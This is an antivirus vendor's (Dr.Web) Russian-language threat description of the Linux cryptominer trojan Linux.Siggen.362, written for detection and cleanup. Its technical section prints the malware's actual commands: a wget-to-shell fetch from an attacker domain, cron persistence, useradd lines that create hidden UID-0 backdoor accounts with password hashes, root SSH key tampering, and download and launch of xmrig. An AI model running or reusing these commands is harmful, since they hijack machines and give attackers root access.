Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.Siggen.362

Добавлен в вирусную базу Dr.Web: 2017-12-30

Описание добавлено:

Техническая информация

Для обеспечения автоматического запуска и распространения:
Создает или модифицирует следующие файлы:
  • /etc/cron.hourly/1
  • /etc/cron.hourly/.placeholder
  • /etc/cron.hourly/0
  • /etc/cron.daily/0
  • /etc/cron.weekly/0
  • /etc/cron.monthly/0
Вредоносные функции:
Получает доступ к ключам SSH
  • /root/.ssh/authorized_keys
Запускает процессы:
  • sh -c wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1
  • wget http://cf0.pw/0/etc/cron.hourly/0 -O-
  • sh
  • sed -i /^[^:]\+:x:0:/{/^root:/!d} /etc/passwd
  • sed -i /^$/d /etc/passwd
  • sed -i /^$/d /etc/shadow
  • useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$f344a097$L.vnLN/nzsnLirq5nMTBg. sudev
  • nscd -i passwd
  • nscd -i group
  • useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$.bHtz1HY$eNtJowby1b0WVTgQT2bLu/ jewbags
  • rm -f /etc/cron.hourly/1
  • mkdir -p /root
  • mkdir -p /root/.ssh
  • wget http://cf0.pw/log/ -O /dev/null
  • chmod +x /etc/cron.hourly/0
  • chmod +x /etc/cron.daily/0
  • chmod +x /etc/cron.weekly/0
  • chmod +x /etc/cron.monthly/0
  • apt-get install wget curl -y
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • pkill -9 xmrig
  • grep rbdYSfTEtykGg /root/.ssh/authorized_keys
  • mkdir -p /usr/libexec
  • chmod 755 /root /root/.ssh /root/.ssh/authorized_keys
  • chown root:root /root /root/.ssh /root/.ssh/authorized_keys
  • rm -f /usr/libexec/x
  • wget http://cf0.pw/0/xmr.tgz -O /usr/libexec/x
  • ps auxw
  • grep -v grep
  • grep xmrig
  • tar zxvf x
  • gzip -d
  • cat /dev/urandom
  • tr -dc _A-Za-z0-9
  • head -c15
  • sed s/c285345992f8ae31/hjzv81FMgGl1oQe/ -i config.json
  • ./xmrig
  • touch /tmp/sdxsdf
  • /bin/sh ./xmrig
Пытается завершает следующие процессы:
  • killall -9 xmrig
Завершает следующие процессы:
  • /usr/lib/apt/methods/http
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
  • /etc/sedqhitX1
  • /etc/sedRTq1ya
  • /etc/sednfHV6k
  • /etc/passwd+
  • /etc/shadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/cron.hourly/0
  • /etc/cron.daily/0
  • /etc/cron.weekly/0
  • /etc/cron.monthly/0
  • /root
  • /root/.ssh
  • /root/.ssh/authorized_keys
  • /usr/libexec/xmrig-2.4.3/xmrig
  • /usr/libexec/xmrig-2.4.3/config.json
  • /usr/libexec/xmrig-2.4.3
  • /usr/libexec/xmrig-2.4.3/sedcMJzJY
Создает папки:
  • /root/.ssh
  • /usr/libexec
  • /usr/libexec/xmrig-2.4.3
Создает символические ссылки (симлинки):
  • /etc/passwd.lock"
  • /etc/group.lock"
  • /etc/gshadow.lock"
  • /etc/subuid.lock"
  • /etc/subgid.lock"
  • /etc/shadow.lock"
Создает или модифицирует файлы:
  • /etc/sedqhitX1
  • /etc/sedRTq1ya
  • /etc/sednfHV6k
  • /etc/.pwd.lock
  • /etc/passwd.693
  • /etc/group.693
  • /etc/gshadow.693
  • /etc/subuid.693
  • /etc/subgid.693
  • /etc/shadow.693
  • /etc/passwd-
  • /etc/passwd+
  • /etc/shadow-
  • /etc/shadow+
  • /etc/subuid-
  • /etc/subuid+
  • /etc/subgid-
  • /etc/subgid+
  • /etc/passwd.698
  • /etc/group.698
  • /etc/gshadow.698
  • /etc/subuid.698
  • /etc/subgid.698
  • /etc/shadow.698
  • /etc/ld.so.preload
  • /var/lib/dpkg/lock
  • /var/cache/apt/archives/lock
  • /usr/libexec/x
  • /usr/libexec"/xmrig-2.4.3/xmrig
  • /usr/libexec/xmrig-2.4.3/xmrig
  • /usr/libexec"/xmrig-2.4.3/config.json
  • /usr/libexec/xmrig-2.4.3/config.json
  • /usr/libexec/xmrig-2.4.3"/sedcMJzJY
  • /usr/libexec/xmrig-2.4.3/sedcMJzJY
  • /tmp/sdxsdf
Удаляет файлы:
  • /etc/passwd.693"
  • /etc/group.693"
  • /etc/gshadow.693"
  • /etc/subuid.693"
  • /etc/subgid.693"
  • /etc/shadow.693"
  • /etc/shadow.lock"
  • /etc/passwd.lock"
  • /etc/group.lock"
  • /etc/gshadow.lock"
  • /etc/subuid.lock"
  • /etc/subgid.lock"
  • /etc/passwd.698"
  • /etc/group.698"
  • /etc/gshadow.698"
  • /etc/subuid.698"
  • /etc/subgid.698"
  • /etc/shadow.698"
  • /etc/cron.hourly/1"
  • /usr/libexec/x"
Сетевая активность:
Устанавливает соединение:
  • <LOCAL_DNS_SERVER>
  • 21#.##6.149.233:80
  • 21#.##1.132.32:80
  • 19#.##.242.89:80
  • [2#######8:dc41:100::233]:80
  • [2#########:1:216:35ff:fe7f:6ceb]:80
  • [2#########:0:216:35ff:fe7f:be4f]:80
HTTP GET-запросы:
  • cf#.####/etc/cron.hourly/0
  • cf#.pw/log/
  • se######.######.######ol/updates/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_i386.deb
  • ft#.##.######.#####ebian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_i386.deb
  • se######.######.#####ool/updates/main/c/curl/curl_7.38.0-4%2bdeb8u5_i386.deb
  • cf#.##/0/xmr.tgz
DNS ASK:
  • cf#.pw
  • se####ty.debian.org
  • ft#.##.debian.org
Прочее:
Собирает информацию о CPU
Собирает информацию об оперативной памяти
Собирает информацию о сетевой активности

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру